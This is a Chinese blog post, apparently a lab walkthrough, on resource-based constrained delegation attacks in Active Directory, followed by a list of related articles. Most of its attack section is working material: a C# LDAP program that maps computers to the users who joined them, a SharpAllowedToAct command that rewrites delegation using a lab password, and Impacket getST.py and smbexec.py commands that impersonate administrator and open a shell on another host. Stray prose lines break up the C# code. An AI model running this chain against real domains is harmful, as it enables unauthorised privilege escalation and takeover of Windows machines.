域渗透之基于资源的约束委派

最新推荐文章于 2024-06-02 15:21:42 发布
最新推荐文章于 2024-06-02 15:21:42 发布
阅读量449 收藏
点赞数
分类专栏: 安全 文章标签: 服务器 java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127858982
版权

域渗透之基于资源的约束委派

注意:server2012才引入了基于资源的约束委派!!! 无需域管设置相关属性,请求ST的过程与先前的约束委派类似,传统的约束委派S4U2Self返回的票据一定是 可转发的,如果不可转发那么S4U2Proxy将失败;但是基于资源的约束委派不同,就算S4U2Self返回的票据 不可转发(可不可以转发由TrustedToAuthenticationForDelegation决定),S4U2Proxy也是可以成 功,并且S4U2Proxy返回的票据总是可转发 总之需要用户对主机的属性具备写权限

基于资源的约束委派原理

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不 再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定 谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDSAllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 这里的关键就是谁可以修改属性

REDTEAM\hack -> WriteProperty(将机器加入域的账号,也就是mS-DS-CreatorSID属性中的账户) NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改) 我们再回顾一个知识点,默认域控的ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域添加 多达10个计算机帐户,就是说只要有一个域凭据就可以在域内任意添加机器账户。这个凭据可以是域内的用户 账户、服务账户、机器账户。

域环境

域管:dc1 10.10.10.142

备用域管:dc2 10.10.10.140

域用户1:12server1 10.10.10.152

域用户2: 12server2 10.10.10.138

资源委派攻击其他域主机获取system权限创建机器主机账号

首先查询域普通用户加入域的机子

cs代码:

![1](C:\Users\lenovo\Desktop\1.png)using System;
using System.Security.Principal;
using System.DirectoryServices;
namespace ConsoleApp9
{
class Program
{
static void Main(string[] args)
{
DirectoryEntry ldap_conn = new
DirectoryEntry("LDAP://dc=redteam,dc=club");
DirectorySearcher search = new DirectorySearcher(ldap_conn);
String query = "(&(objectClass=computer))";//查找计算机
search.Filter = query;
foreach (SearchResult r in search.FindAll())
{
String mS_DS_CreatorSID = "";
String computername = "";
try
{
computername = r.Properties["dNSHostName"][0].ToString();
mS_DS_CreatorSID = (new
SecurityIdentifier((byte[])r.Properties["mS-DS-CreatorSID"][0], 0)).ToString();
//Console.WriteLine("{0} {1}\n", computername,
mS_DS_CreatorSID);
}
catch
{
;
}
//再通过sid找用户名
String UserQuery = "(&(objectClass=user))";
DirectorySearcher search2 = new DirectorySearcher(ldap_conn);
查询到加入域主机的 域用户
使用SharpAllowedToAct修改委派 工具下载 https://github.com/HPVCA/SharpAllowedToAct
获取服务票据
search2.Filter = UserQuery;
foreach (SearchResult u in search2.FindAll())
{
String user_sid = (new
SecurityIdentifier((byte[])u.Properties["objectSid"][0], 0)).ToString();
if (user_sid == mS_DS_CreatorSID)
{
//Console.WriteLine("debug");
String username = u.Properties["name"][0].ToString();
Console.WriteLine("[*] [{0}] -> creator [{1}]",
computername, username);
}
}
}
}
}
}

编译代码生成exe

.\csc /out:D:\ConsoleApp9.exe "C:\Users\lenovo\Desktop\ConsoleApp9.cs"

查询到加入域主机的 域用户

 

使用SharpAllowedToAct修改委派 工具下载

GitHub - HPVCA/SharpAllowedToAct: Computer object takeover through Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity)

SharpAllowedToAct.exe -m hack -p pass@123 -t 12server2 -a 10.10.10.142
redteam.club

 

修改kali配置文件

 

获取服务票据

python3 getST.py -dc-ip 10.10.10.142 redteam/hack\$:pass@123 -spn
cifs/12server2.redteam.club -impersonate administrator

 

 

获取域普通主机权限

export KRB5CCNAME=administrator.ccache
python3 smbexec.py -no-pass -k 12server2.redteam.club

 You complete me

夜yesec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
基于资源约束委派
mingyqf的博客
02-23 828
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
内攻击--->基于资源约束委派(RBCD)
最新发布
huohaowen的博客
06-02 739
基于资源约束委派RBCD他来啦~~~!!!
基于资源约束委派攻击
good good study
04-13 2112
基于资源约束委派 (RBCD:Resource Based Constrained Delegation):为了使⽤户/资源更加独⽴,微软在Windows Server 2012中引⼊了基于资源约束委派。基于资源约束委派不需要管理员权限去设置,⽽把设置属性的权限赋予给了机器⾃身。 配置了基于资源约束委派的账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值为被允许基于资源约束委派的账号的SID。如admin--pc的 msDS-AllowedT
基于资源约束委派(RBCD)学习
whojoe的博客
07-21 2897
基于资源约束委派(RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章 原理 环境搭建 主机 机器名 ip 用户 密码 版本 控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 内机器 user2.test.com 192.168.164.150
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是从加入的计算机(通常是Windows)发起的攻击。 仅使用Python3 (及其依赖项)实施攻击。 在上测试了最新的Impacket(撰写本文时为0.9.21)。 攻击 总而言之,攻击没有针对任何深度细节,而是针对计算机,正是与目标计算机相关的服务主体。 我们在这里需要具备的先决条件: 具有对目标计算机的写访问权的帐户(对目标计算机对象的msDS-AllowedToActOnBehalfOfOtherIdentity属性的完全写访问权) 创建新计算机帐户的权限(通常是默认设置,请参见MachineAccount
渗透完全技巧.pdf
10-03
3. **获取控的方法**:攻击者可能利用SYSVOL共享、MS14-068漏洞、Kerberos SPN扫描、Kerberos的黄金和银票攻击、服务账号破解、凭证盗窃(如NTLM重放攻击)、Kerberos委派、地址解析协议(ARP)欺骗、zerologon...
rubeus+spoolsample.zip渗透约束委派攻击实验
08-19
在网络安全领,特别是针对Windows环境的渗透测试中,非约束委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于非...
AD委派后门详解-1
06-19
本文将详细介绍三种类型的委派,以及攻击者如何利用这些委派进行非约束委派攻击、约束委派攻击和基于资源约束委派攻击。 1. **非约束委派攻击** 非约束委派允许服务账号在任何地方代表用户进行身份验证,而不...
内网渗透--环境下基于资源约束委派利用
sangfor_edu的博客
07-21 396
内用户都有一个属性叫做ms-ds-MachineAccountQuota,它代表的是允许用户在中常见计算机账户的个数,默认是10。那么这就代表我们如果拥有一个普通的用户那么我们就可以利用这个用户最多可以创建十个新的计算机帐户也就是机器账户。...
滥用基于资源约束委派来攻击Active Directory
weixin_30530523的博客
03-15 458
0x00 前言 早在2018年3月前,我就开始了一场毫无意义的争论,以证明TrustedToAuthForDelegation属性是无意义的,并且可以在没有该属性的情况下实现“协议转换”。我相信,只要一旦启用约束委派(msDS-AllowedToDelegateTo不为空),它是否配置为使用“仅Kerberos”或“任何身份验证协议”并起作用。 我在Benjamin Delpy(@genti...
权限维持】-基于资源约束委派(RBCD)
qq_41617902的博客
01-20 841
基于资源约束委派(RBCD)
渗透委派攻击之基于资源约束委派
Longwaer
01-25 1265
学习委派攻击,了解掌握基于资源约束委派原理及利用方式。
渗透——基于资源约束委派利用
a3320315的博客
07-03 1833
环境 : test.com 控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 委派内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24 内普通用户: test,对win2008有写的权限 内普通用户: test1 攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1 设置test的写权限 验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
Kerberos 委派攻击之基于资源约束委派
Adminxe的博客
03-06 629
CSDN自动迁移博客文章注意区别:约束委派 不能跨进行委派,基于资源约束委派可以跨和林如果约束委派,必须拥有权限,该特权是敏感的,通常仅授予管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源约束委派。基于资源约束委派不需要管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源约束委派允许资源配置受信任的帐户委派给他们。基于资源约束委派只能在运行 ·Windows Server 2012 及以上的控制器·上配置,
基于windows中委派的攻击思路(下)-基于资源约束委派
热门推荐
Shanfenglan's blog
12-16 3万+
文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket 1. 前
基于资源约束委派利用
qq_18811919的博客
02-25 806
关于基于资源约束委派本文章总共说了常用的三种利用方式: 1.Ntlm Relay+打印机bug+基于资源约束委派拿下目标控制权 2.Acount Operators组权限滥用进行基于资源约束委派获取目标权限 3.拿下目标机器入账号拿下目标控制权 以及一种绕过方式: 1.CVE-2020-17049 Kerberos Bronze Bit+基于资源约束委派绕过敏感账号限制。
渗透委派攻击(非约束/约束/基于资源约束)原理及利用
actistsec的博客
10-15 470
渗透委派攻击初步了解及利用方法
委派
weixin_30737433的博客
04-20 69
完全不能理解,这到底是个什么玩意。 转载于:https://www.cnblogs.com/yesihoang/p/4441712.html

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值